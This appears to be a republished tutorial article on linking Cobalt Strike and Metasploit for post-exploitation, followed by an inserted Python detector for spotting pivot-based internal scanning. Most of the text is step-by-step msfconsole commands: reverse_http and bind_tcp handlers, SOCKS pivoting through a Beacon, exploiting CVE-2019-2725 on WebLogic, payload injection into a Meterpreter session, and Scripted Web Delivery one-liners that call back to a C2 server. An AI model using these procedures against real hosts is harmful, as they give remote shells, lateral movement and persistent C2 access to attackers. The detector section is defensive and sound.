2025-04-04 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
In this issue, the editor brings you an example analysis of how CobaltStrike and Metasploit can be linked together. The article is rich in content and examines the topic from a professional point of view; I hope you get something out of it.
Personally, I feel that CobaltStrike, with its graphical interface and rich feature set, is an excellent post-exploitation framework. It is especially convenient for managing the data and shells collected during lateral movement, but it is weak at vulnerability exploitation and at the initial breakthrough. Metasploit, on the other hand, is an exploitation framework: its exploits run smoothly and its many modules cover scanning, breakthrough and expansion as a one-stop service, but it is rather weak at managing many shells (after all, there is no graphical interface, and there are too many commands to remember). So how to link the two frameworks effectively is what we want to learn today.
1. Using CS to serve MSF
Use a CS Beacon to spawn a shell to MSF to perform subsequent penetration tasks:
Configure a listener in MSF:
# configure the listener
msf > use exploit/multi/handler
# select the payload
msf > set payload windows/meterpreter/reverse_http
msf > set lhost <IP>
msf > set lport <port>
# launch the listener as a background job
msf > set ExitOnSession false
msf > run -jz
Set up an external listener of type Foreign HTTP (or Foreign HTTPS) in CS.
Select the target Beacon you want to spawn from, right-click, choose the spawn function, select the listener you just created, and MSF will receive the callback.
Use CS to provide port forwarding or a proxy for MSF for subsequent scanning and exploitation:
Set up a SOCKS proxy with Beacon:
Enter the SOCKS listening port in the Beacon console, or right-click the Beacon you want to use as the pivot, choose Pivoting -> SOCKS Server, set the listening port and click Launch to activate it.
The established pivot is listed in View -> Proxy Pivots. Click Tunnel to get the proxy command for MSF.
Copy it into MSF and set the proxy and the payload type.
The test target is a host vulnerable to CVE-2019-2725.
# set the proxy
msf > setg Proxies socks4:127.0.0.1:36725
# configure the payload. Because the host in the isolated network segment cannot
# connect back to MSF directly, use a bind-type payload that waits for a connection
msf > set payload windows/meterpreter/bind_tcp
msf > run
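From the defender's side, the visible effect of the pivot above is that the Beacon host, not the operator's machine, originates every scan and exploit connection on the internal network: one workstation suddenly talks to many internal hosts on a few service ports within minutes. The following is an added example, not code from the article: a small fan-out detector over constructed flow records (timestamp, source, destination, destination port). The window size and host threshold are assumed tuning values, and the flow format is a simple CSV invented for the example.

```python
from collections import deque
from datetime import datetime, timedelta

# Constructed flow log (not from the article), one record per line:
# "timestamp,src_ip,dst_ip,dst_port". 10.0.5.23 plays the Beacon host whose
# SOCKS pivot is being used by MSF for scanning; 10.0.5.40 is an ordinary workstation.
SAMPLE_FLOW_LINES = (
    [f"2024-05-31T10:00:{i:02d},10.0.5.23,10.0.20.{i + 1},445" for i in range(15)]
    + [f"2024-05-31T10:01:{i:02d},10.0.5.23,10.0.20.{i + 1},7001" for i in range(15)]
    + [
        "2024-05-31T10:00:05,10.0.5.40,10.0.10.5,443",
        "2024-05-31T10:00:09,10.0.5.40,10.0.10.6,53",
        "2024-05-31T10:02:30,10.0.5.40,10.0.10.5,443",
    ]
)


def parse_flows(lines):
    """Turn CSV-style flow lines into dicts with a real datetime."""
    flows = []
    for line in lines:
        ts, src, dst, dport = line.strip().split(",")
        flows.append({"ts": datetime.fromisoformat(ts), "src": src,
                      "dst": dst, "dport": int(dport)})
    return flows


def fanout_alerts(flows, window=timedelta(minutes=5), host_threshold=10):
    """Report each source that contacts at least host_threshold distinct
    destinations inside some sliding window. One alert per source, describing
    the widest window seen, keeps the output small enough for triage.
    Thresholds are assumed values; tune them to the network's baseline."""
    by_src = {}
    for f in sorted(flows, key=lambda f: f["ts"]):
        by_src.setdefault(f["src"], []).append(f)

    alerts = []
    for src, items in by_src.items():
        win = deque()   # flows currently inside the window
        counts = {}     # dst -> number of flows in the window to that dst
        best = None
        for f in items:
            win.append(f)
            counts[f["dst"]] = counts.get(f["dst"], 0) + 1
            # slide the window: evict flows older than `window` relative to f
            while f["ts"] - win[0]["ts"] > window:
                old = win.popleft()
                counts[old["dst"]] -= 1
                if counts[old["dst"]] == 0:
                    del counts[old["dst"]]
            if len(counts) >= host_threshold and (
                best is None or len(counts) >= best["distinct_hosts"]
            ):
                best = {
                    "src": src,
                    "window_start": win[0]["ts"],
                    "window_end": f["ts"],
                    "distinct_hosts": len(counts),
                    "ports": sorted({x["dport"] for x in win}),
                }
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in fanout_alerts(parse_flows(SAMPLE_FLOW_LINES)):
        print(f"{a['src']} reached {a['distinct_hosts']} hosts on ports {a['ports']} "
              f"between {a['window_start']:%H:%M:%S} and {a['window_end']:%H:%M:%S}")
```

On the constructed data only the pivot host trips the rule (15 distinct hosts on ports 445 and 7001 inside a 75-second span); the ordinary workstation never exceeds two destinations. Because a bind-type payload makes the exploited host listen and the pivot host connect in, the same fan-out view also catches the follow-up connection to the newly opened port.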
2. Using MSF to serve CS
The main idea is to use the exploits of the MSF framework to obtain a CS Beacon.
A command-execution shell was obtained:
This is the simplest and most common case; not all exploits return a Meterpreter session.
Deploy a payload delivery site in CS via Attacks -> Web Drive-by -> Scripted Web Delivery:
Configure the listener and the URL path; after starting it, the corresponding one-line command is displayed.
Copy that command and execute it directly in the MSF shell session.
After the command runs, the MSF session will hang; you can kill it directly without affecting the CS session.
A Meterpreter session was obtained:
After obtaining a Meterpreter session, use the MSF injection module to load the CS payload:
# background the meterpreter session
meterpreter > background
# enter the payload_inject module
msf > use exploit/windows/local/payload_inject
# select the payload matching the CS listener (http or https)
msf > set payload windows/meterpreter/reverse_http
# set the callback address (the CS listener address)
msf > set LHOST <CS_IP>
msf > set LPORT <CS_PORT>
# specify the meterpreter session to use
msf > set SESSION <meterpreter session ID>
# tell MSF not to start its own handler (otherwise msf reports success
# but no session is established, and CS never receives the session)
msf > set DisablePayloadHandler true
msf > run
During testing it turned out that this method can only inject a 32-bit payload: injecting a 64-bit payload crashes the target process, and a 32-bit payload cannot be injected into a 64-bit process. The crash is reported as APPCRASH (fault module StackHash_af76), and it persists even with SYSTEM privileges and UAC disabled. If no PID is set, a 32-bit notepad.exe process is created to host the payload. Remember to migrate the CS session to another process promptly after the connection is established.
Calling back to CS directly:
Request and load the CS payload directly during the MSF exploit. This is basically the same as the second method (the test vulnerability is CVE-2019-2725):
# select the payload matching the type of the CS listener
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_http
# set the callback address (the CS listener address)
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST <CS_IP>
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LPORT <CS_PORT>
# a direct exploit has no existing session, so no SESSION option is needed here.
# tell MSF not to start its own handler (otherwise msf reports success
# but no session is established, and CS never receives the session)
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set DisablePayloadHandler true
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > run
In fact this is the same as the second method: call the MSF module and configure the payload parameters. After successful exploitation, a windowless powershell calls back to CS directly, and no window pops up on the target host. A 64-bit payload could not be loaded during testing, probably because a 32-bit cmd.exe is launched to execute the follow-up commands after this vulnerability is exploited.
3. Afterword
At first I only planned to write a study note; after all, a good memory is no match for a bad pen, what I have read may be forgotten if it is not used for a long time, and it is convenient to leave a memo for future reference. After that, however, it turned into a process of falling into pits. I thought I was so smart: "the names of these two payloads look alike, and the article does not mention them, so can they be linked as well?" The methods described online (Chinese articles) are basically the same as the official guide released by CS in 2016, but as I see it there are now more than three kinds of Listener in CS:
HTTP and HTTPS
DNS, SMB, TCP
and MSF has payloads such as
windows/meterpreter/reverse_tcp_dns
windows/meterpreter/bind_named_pipe
windows/meterpreter/reverse_tcp
After testing these similar-looking payload modules, only the http and https payloads can receive a session from the other side. Sure enough, I am still too young: no one mentioned it because it really is not used this way. After all, the two frameworks were independent from the start, so it is already something that there is a way to connect two mature frameworks at all. One should not ask for too much in the first place.
The above is the editor's example analysis of the linkage between CobaltStrike and Metasploit. If you happen to have similar questions, you may refer to the above analysis. If you want to know more, you are welcome to follow the industry information channel.